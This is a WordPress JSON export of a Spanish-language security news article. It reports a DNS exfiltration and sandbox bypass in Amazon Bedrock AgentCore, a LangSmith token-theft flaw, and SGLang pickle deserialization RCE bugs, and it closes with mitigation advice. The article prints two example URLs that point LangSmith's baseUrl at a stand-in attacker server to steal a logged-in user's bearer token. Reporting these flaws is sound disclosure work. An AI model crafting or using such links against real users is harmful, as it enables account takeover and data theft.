{"id":274,"date":"2026-03-17T18:23:54","date_gmt":"2026-03-17T18:23:54","guid":{"rendered":"https:\/\/cybercolombia.co\/index.php\/2026\/03\/17\/los-fallos-de-la-ia-en-amazon-bedrock-langsmith-y-sglang-permiten-la-filtracion-de-datos-y-el-rce-cyberdefensa-mx\/"},"modified":"2026-03-17T18:23:54","modified_gmt":"2026-03-17T18:23:54","slug":"los-fallos-de-la-ia-en-amazon-bedrock-langsmith-y-sglang-permiten-la-filtracion-de-datos-y-el-rce-cyberdefensa-mx","status":"publish","type":"post","link":"https:\/\/cybercolombia.co\/index.php\/2026\/03\/17\/los-fallos-de-la-ia-en-amazon-bedrock-langsmith-y-sglang-permiten-la-filtracion-de-datos-y-el-rce-cyberdefensa-mx\/","title":{"rendered":"Los fallos de la IA en Amazon Bedrock, LangSmith y SGLang permiten la filtraci\u00f3n de datos y el RCE \u2013 CYBERDEFENSA.MX"},"content":{"rendered":"<div id=\"articlebody\">\n<p>Investigadores de ciberseguridad han revelado detalles de un nuevo m\u00e9todo para extraer datos confidenciales de entornos de ejecuci\u00f3n de c\u00f3digo de inteligencia artificial (IA) mediante consultas del sistema de nombres de dominio (DNS).<\/p>\n<p>En un informe publicado el lunes, BeyondTrust <a href=\"https:\/\/www.beyondtrust.com\/blog\/entry\/aws-bedrock-agentcore-sandbox-breakout\" rel=\"noopener\" target=\"_blank\">revel\u00f3<\/a> que el modo sandbox de Amazon Bedrock AgentCore Code Interpreter permite consultas DNS salientes que un atacante puede aprovechar para habilitar shells interactivos y evitar el aislamiento de la red. La emisi\u00f3n, que no tiene un identificador CVE, tiene una puntuaci\u00f3n CVSS de 7,5 sobre 10,0.<\/p>\n<p><a href=\"https:\/\/aws.amazon.com\/blogs\/machine-learning\/introducing-the-amazon-bedrock-agentcore-code-interpreter\/\" rel=\"noopener\" target=\"_blank\">Int\u00e9rprete de c\u00f3digo de Amazon Bedrock AgentCore<\/a> es un servicio totalmente administrado que permite a los agentes de IA ejecutar c\u00f3digo de forma segura en <a href=\"https:\/\/docs.aws.amazon.com\/bedrock-agentcore\/latest\/devguide\/code-interpreter-tool.html\" rel=\"noopener\" target=\"_blank\">entornos aislados tipo sandbox<\/a>de modo que las cargas de trabajo agentes no puedan acceder a sistemas externos. Fue lanzado por Amazon en agosto de 2025.<\/p>\n<p>El hecho de que el servicio permita consultas de DNS a pesar de la configuraci\u00f3n de \u00absin acceso a la red\u00bb puede permitir que \u00ablos actores de amenazas establezcan canales de comando y control y exfiltraci\u00f3n de datos a trav\u00e9s de DNS en ciertos escenarios, evitando los controles de aislamiento de red esperados\u00bb, dijo Kinnaird McQuade, arquitecto jefe de seguridad de BeyondTrust.<\/p>\n<p>En un escenario de ataque experimental, un actor de amenazas puede abusar de este comportamiento para configurar un canal de comunicaci\u00f3n bidireccional mediante consultas y respuestas de DNS, obtener un shell inverso interactivo, filtrar informaci\u00f3n confidencial a trav\u00e9s de consultas de DNS si su funci\u00f3n de IAM tiene permisos para acceder a recursos de AWS, como dep\u00f3sitos S3 que almacenan esos datos, y ejecutar comandos.<\/p>\n<div class=\"dog_two clear\">\n<div class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/not-fast-enough-d\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"Ciberseguridad\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhlXM830ruQd2xT6M7JNeNRjaFa1onD12WjSCHihTFMTzbyfT9h-irPmXy_h3E1HGSs6sdv7FTmnyNVTM5kmSb7BuUtZe8gKoTQt99P1sSzRcqqXpOJP6eoAOhR3DGb6qHx9kOZ_HBZUMmVnsnd0DM7QfUp81bgzTvvgLww6oqB-EhnDfWXH5pWCYhAsyLs\/s728-e100\/tl-d.jpg\" width=\"729\" height=\"91\"\/><\/a><\/div>\n<\/div>\n<p>Es m\u00e1s, se puede abusar del mecanismo de comunicaci\u00f3n DNS para entregar cargas \u00fatiles adicionales que se env\u00edan al int\u00e9rprete de c\u00f3digo, lo que hace que sondee el servidor de comando y control (C2) de DNS en busca de comandos almacenados en registros DNS A, los ejecute y devuelva los resultados a trav\u00e9s de consultas de subdominio DNS.<\/p>\n<p>Vale la pena se\u00f1alar que Code Interpreter requiere una funci\u00f3n de IAM para acceder a los recursos de AWS. Sin embargo, un simple descuido puede provocar que se asigne una funci\u00f3n con privilegios excesivos al servicio, otorg\u00e1ndole amplios permisos para acceder a datos confidenciales.<\/p>\n<p>\u00abEsta investigaci\u00f3n demuestra c\u00f3mo la resoluci\u00f3n DNS puede socavar las garant\u00edas de aislamiento de la red de los int\u00e9rpretes de c\u00f3digo aislados\u00bb, dijo BeyondTrust. \u00abAl utilizar este m\u00e9todo, los atacantes podr\u00edan haber extra\u00eddo datos confidenciales de los recursos de AWS accesibles a trav\u00e9s de la funci\u00f3n IAM del int\u00e9rprete de c\u00f3digo, lo que podr\u00eda causar tiempo de inactividad, violaciones de datos de informaci\u00f3n confidencial del cliente o infraestructura eliminada\u00bb.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj4gwwDqqCOtOURMZKC3ZkMohSzFz8Q1WcKeomOQ88UDz-3somcDlJ1JXxBQyWbIfjZ2fgcj7lQKnVf4zqimi7lTWlyVwr2tLpBBxGRu_OUGChr7GC4Hc8VXLpcOMtuiX9jLhkgVHNanbniiON1assbvB7mPuTbH5aLN-S6wxG9IuxKri7pj__ivIJc4uMX\/s1700-e365\/chatbot-attack.jpg\" style=\"clear: left; display: block; float: left;  text-align: center;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj4gwwDqqCOtOURMZKC3ZkMohSzFz8Q1WcKeomOQ88UDz-3somcDlJ1JXxBQyWbIfjZ2fgcj7lQKnVf4zqimi7lTWlyVwr2tLpBBxGRu_OUGChr7GC4Hc8VXLpcOMtuiX9jLhkgVHNanbniiON1assbvB7mPuTbH5aLN-S6wxG9IuxKri7pj__ivIJc4uMX\/s1700-e365\/chatbot-attack.jpg\" alt=\"\" border=\"0\" data-original-height=\"777\" data-original-width=\"1036\"\/><\/a><\/div>\n<p>Tras la divulgaci\u00f3n responsable en septiembre de 2025, Amazon determin\u00f3 que se trataba de una funcionalidad prevista y no de un defecto, e inst\u00f3 a los clientes a utilizar <a href=\"https:\/\/docs.aws.amazon.com\/vpc\/latest\/userguide\/what-is-amazon-vpc.html\" rel=\"noopener\" target=\"_blank\">modo VPC<\/a> en lugar del modo sandbox para un aislamiento completo de la red. El gigante tecnol\u00f3gico tambi\u00e9n recomienda el uso de un <a href=\"https:\/\/aws.amazon.com\/blogs\/security\/protect-against-advanced-dns-threats-with-amazon-route-53-resolver-dns-firewall\/\" rel=\"noopener\" target=\"_blank\">cortafuegos DNS<\/a> para filtrar el tr\u00e1fico DNS saliente.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh1iLVUjIiSkk1ca72MpSGxKhA5wjrO-Mj05TJLrpoU6EjKmvhk16knLOo2_Kpj-Wx845uWagUnvS1-i1eVbqH-_KmeJlerwZJbsH3QRATPvqzmsYiplto-XA3y7BEnRvxHRwB17JTsVqsAO1JVSa2rzRnTmtTfoNAM4ARVQkZ-oqnB8HuI6oHMQ5hsTa7O\/s1700-e365\/llm.png\" style=\"clear: left; display: block; float: left;  text-align: center;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh1iLVUjIiSkk1ca72MpSGxKhA5wjrO-Mj05TJLrpoU6EjKmvhk16knLOo2_Kpj-Wx845uWagUnvS1-i1eVbqH-_KmeJlerwZJbsH3QRATPvqzmsYiplto-XA3y7BEnRvxHRwB17JTsVqsAO1JVSa2rzRnTmtTfoNAM4ARVQkZ-oqnB8HuI6oHMQ5hsTa7O\/s1700-e365\/llm.png\" alt=\"\" border=\"0\" data-original-height=\"452\" data-original-width=\"1124\"\/><\/a><\/div>\n<p>\u00abPara proteger las cargas de trabajo sensibles, los administradores deben inventariar todas las instancias activas de AgentCore Code Interpreter y migrar inmediatamente aquellas que manejan datos cr\u00edticos del modo Sandbox al modo VPC\u00bb, dijo Jason Soroko, miembro senior de Sectigo.<\/p>\n<p>\u00abOperar dentro de una VPC proporciona la infraestructura necesaria para un aislamiento s\u00f3lido de la red, lo que permite a los equipos implementar grupos de seguridad estrictos, ACL de red y firewalls DNS Route53 Resolver para monitorear y bloquear la resoluci\u00f3n DNS no autorizada. Finalmente, los equipos de seguridad deben auditar rigurosamente las funciones de IAM adjuntas a estos int\u00e9rpretes, aplicando estrictamente el principio de privilegio m\u00ednimo para restringir el radio de explosi\u00f3n de cualquier posible compromiso\u00bb.<\/p>\n<h2 style=\"text-align: left;\">LangSmith es susceptible a un error de adquisici\u00f3n de cuentas<\/h2>\n<p>La divulgaci\u00f3n se produce cuando Miggo Security revel\u00f3 una falla de seguridad de alta gravedad en LangSmith (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2026-25750\" rel=\"noopener\" target=\"_blank\">CVE-2026-25750<\/a>puntuaci\u00f3n CVSS: 8,5) que expon\u00eda a los usuarios a un posible robo de tokens y apropiaci\u00f3n de cuentas. El problema, que afecta tanto a las implementaciones autohospedadas como a las implementaciones en la nube, se solucion\u00f3 en la versi\u00f3n 0.12.71 de LangSmith, lanzada en diciembre de 2025.<\/p>\n<p>La deficiencia se ha caracterizado como un caso de inyecci\u00f3n de par\u00e1metros de URL derivada de una falta de validaci\u00f3n en el par\u00e1metro baseUrl, lo que permite a un atacante robar el token de portador, la ID de usuario y la ID del espacio de trabajo de un usuario que ha iniciado sesi\u00f3n y transmitidos a un servidor bajo su control mediante t\u00e9cnicas de ingenier\u00eda social, como enga\u00f1ar a la v\u00edctima para que haga clic en un enlace especialmente dise\u00f1ado como el siguiente:<\/p>\n<ul>\n<li>Nube \u2013 smith.langchain[.]es\/studio\/?baseUrl=https:\/\/attacker-server.com<\/li>\n<li>Autohospedado \u2013 <langsmith_domain_of_the_customer>\/studio\/?baseUrl=https:\/\/attacker-server.com<\/langsmith_domain_of_the_customer><\/li>\n<\/ul>\n<p>La explotaci\u00f3n exitosa de la vulnerabilidad podr\u00eda permitir a un atacante obtener acceso no autorizado al historial de seguimiento de la IA, as\u00ed como exponer consultas SQL internas, registros de clientes de CRM o c\u00f3digo fuente propietario mediante la revisi\u00f3n de llamadas a herramientas.<\/p>\n<p>\u00abUn usuario de LangSmith que haya iniciado sesi\u00f3n podr\u00eda verse comprometido simplemente accediendo a un sitio controlado por un atacante o haciendo clic en un enlace malicioso\u00bb, afirman los investigadores de Miggo, Liad Eliyahu y Eliana Vuijsje. <a href=\"https:\/\/www.miggo.io\/post\/hack-the-ai-brain-uncovering-an-account-takeover-vulnerability-in-langsmith\" rel=\"noopener\" target=\"_blank\">dicho<\/a>.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg8GibmgyeyM8G1U1qm-RtA-KdqL6lGXwSW0j6tOsIGUfgMwTs_sFjLa2zKm7FazLF41RyBOXlvGO8xhjLE8iE7bad4TTBTiAzgWWyLJyv9pFJX8qjLg80ueKOt6EK8s4BhMNipaZ9N-u1WWWnAPhKhO36dyzagFAzCg_2peu9B79-F478nk9ojEUo7AVZJ\/s1700-e365\/lang.jpg\" style=\"clear: left; display: block; float: left;  text-align: center;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg8GibmgyeyM8G1U1qm-RtA-KdqL6lGXwSW0j6tOsIGUfgMwTs_sFjLa2zKm7FazLF41RyBOXlvGO8xhjLE8iE7bad4TTBTiAzgWWyLJyv9pFJX8qjLg80ueKOt6EK8s4BhMNipaZ9N-u1WWWnAPhKhO36dyzagFAzCg_2peu9B79-F478nk9ojEUo7AVZJ\/s1700-e365\/lang.jpg\" alt=\"\" border=\"0\" data-original-height=\"1500\" data-original-width=\"2400\"\/><\/a><\/div>\n<p>\u00abEsta vulnerabilidad es un recordatorio de que las plataformas de observabilidad de IA son ahora una infraestructura cr\u00edtica. Como estas herramientas priorizan la flexibilidad de los desarrolladores, a menudo pasan por alto sin darse cuenta las barreras de seguridad. Este riesgo se agrava porque, al igual que el software &#8216;tradicional&#8217;, los agentes de IA tienen acceso profundo a fuentes de datos internas y servicios de terceros\u00bb.<\/p>\n<h2 style=\"text-align: left;\">Defectos de deserializaci\u00f3n de pepinillos inseguros en SGLang<\/h2>\n<p>Tambi\u00e9n se han se\u00f1alado vulnerabilidades de seguridad en SGLang, un popular marco de c\u00f3digo abierto para servir modelos de lenguaje grandes y modelos de IA multimodal, que, si se explotan con \u00e9xito, podr\u00edan desencadenar una deserializaci\u00f3n insegura de pickle, lo que podr\u00eda resultar en la ejecuci\u00f3n remota de c\u00f3digo.<\/p>\n<p>Las vulnerabilidades, descubiertas por el investigador de seguridad de Orca, Igor Stepansky, siguen sin parchearse al momento de escribir este art\u00edculo. Una breve descripci\u00f3n de las fallas es la siguiente:<\/p>\n<ul>\n<li><strong><a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2026-3059\" rel=\"noopener\" target=\"_blank\">CVE-2026-3059<\/a><\/strong>  (Puntuaci\u00f3n CVSS: 9,8): una vulnerabilidad de ejecuci\u00f3n remota de c\u00f3digo no autenticado a trav\u00e9s del broker ZeroMQ (tambi\u00e9n conocido como ZMQ), que deserializa datos que no son de confianza utilizando pickle.loads() sin autenticaci\u00f3n. Afecta al m\u00f3dulo de generaci\u00f3n multimodal de SGLang.<\/li>\n<li><strong><a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2026-3060\" rel=\"noopener\" target=\"_blank\">CVE-2026-3060<\/a><\/strong>  (Puntuaci\u00f3n CVSS: 9,8): una vulnerabilidad de ejecuci\u00f3n remota de c\u00f3digo no autenticado a trav\u00e9s del m\u00f3dulo de desagregaci\u00f3n, que deserializa datos que no son de confianza utilizando pickle.loads() sin autenticaci\u00f3n. Afecta al sistema de desagregaci\u00f3n paralela del codificador SGLang.<\/li>\n<li><strong><a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2026-3989\" rel=\"noopener\" target=\"_blank\">CVE-2026-3989<\/a><\/strong>  (Puntuaci\u00f3n CVSS: 7,8): el uso de una funci\u00f3n pickle.load() insegura sin validaci\u00f3n y deserializaci\u00f3n adecuada en \u00abreplay_request_dump.py\u00bb de SGLang, que puede explotarse proporcionando un archivo pickle malicioso.<\/li>\n<\/ul>\n<p>\u00abLos dos primeros permiten la ejecuci\u00f3n remota de c\u00f3digo no autenticado contra cualquier implementaci\u00f3n de SGLang que exponga sus caracter\u00edsticas de generaci\u00f3n o desagregaci\u00f3n multimodal a la red\u00bb, Stepansky <a href=\"https:\/\/orca.security\/resources\/blog\/sglang-llm-framework-rce-vulnerabilities\/\" rel=\"noopener\" target=\"_blank\">dicho<\/a>. \u00abEl tercero implica una deserializaci\u00f3n insegura en una utilidad de reproducci\u00f3n de volcado de memoria\u00bb.<\/p>\n<div class=\"dog_two clear\">\n<div class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/fs-report-d\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"Ciberseguridad\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWQgUDT06NQu9vGMPC7BWROmJABTIWg058l7oGKD-v3ZchC8_66xjbclOE9koChsRf5CEKgqrXTVrne_00PdGokh3brhvF-g33I4FYYpTukrvuNQWXZOVAfon6-2axyRoVJ4uOrXPqRhxfZUaJWEm-K9esUS3ql8VSVWAKLqyfhHLgMSXhkMTkcOtGSX7R\/s728-e100\/fs-report-d.png\" width=\"729\" height=\"91\"\/><\/a><\/div>\n<\/div>\n<p>En un aviso coordinado, el Centro de Coordinaci\u00f3n CERT (CERT\/CC) dijo que SGLang es vulnerable a CVE-2026-3059 cuando el sistema de generaci\u00f3n multimodal est\u00e1 habilitado, y a CVE-2026-3060 cuando el sistema de desagregaci\u00f3n paralela del codificador est\u00e1 habilitado.<\/p>\n<p>\u00abSi se cumple cualquiera de las condiciones y un atacante conoce el puerto TCP en el que el corredor ZMQ est\u00e1 escuchando y puede enviar solicitudes al servidor, puede explotar la vulnerabilidad enviando un archivo pickle malicioso al corredor, que luego lo deserializar\u00e1\u00bb, CERT\/CC <a href=\"https:\/\/kb.cert.org\/vuls\/id\/665416\" rel=\"noopener\" target=\"_blank\">dicho<\/a>.<\/p>\n<p>Se recomienda a los usuarios de SGLang restringir el acceso a las interfaces del servicio y asegurarse de que no est\u00e9n expuestos a redes que no sean de confianza. Tambi\u00e9n se recomienda implementar controles de acceso y segmentaci\u00f3n de red adecuados para evitar la interacci\u00f3n no autorizada con los puntos finales de ZeroMQ.<\/p>\n<p>Si bien no hay evidencia de que estas vulnerabilidades hayan sido explotadas en la naturaleza, es crucial monitorear conexiones TCP entrantes inesperadas al puerto del corredor ZeroMQ, procesos secundarios inesperados generados por el proceso SGLang Python, creaci\u00f3n de archivos en ubicaciones inusuales por el proceso SGLang y conexiones salientes del proceso SGLang a destinos inesperados.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Investigadores de ciberseguridad han revelado detalles de un nuevo m\u00e9todo para extraer datos confidenciales de entornos de ejecuci\u00f3n de c\u00f3digo de inteligencia artificial (IA) mediante consultas del sistema de nombres de dominio (DNS). En un informe publicado el lunes, BeyondTrust revel\u00f3 que el modo sandbox de Amazon Bedrock AgentCore Code Interpreter permite consultas DNS salientes [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":108,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25,5],"tags":[712,968,24,627,847,888,969,52,765,779,970],"class_list":["post-274","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","category-trending","tag-amazon","tag-bedrock","tag-cyberdefensa-mx","tag-datos","tag-fallos","tag-filtracion","tag-langsmith","tag-los","tag-permiten","tag-rce","tag-sglang"],"_links":{"self":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts\/274","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/comments?post=274"}],"version-history":[{"count":0,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts\/274\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/media\/108"}],"wp:attachment":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/media?parent=274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/categories?post=274"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/tags?post=274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}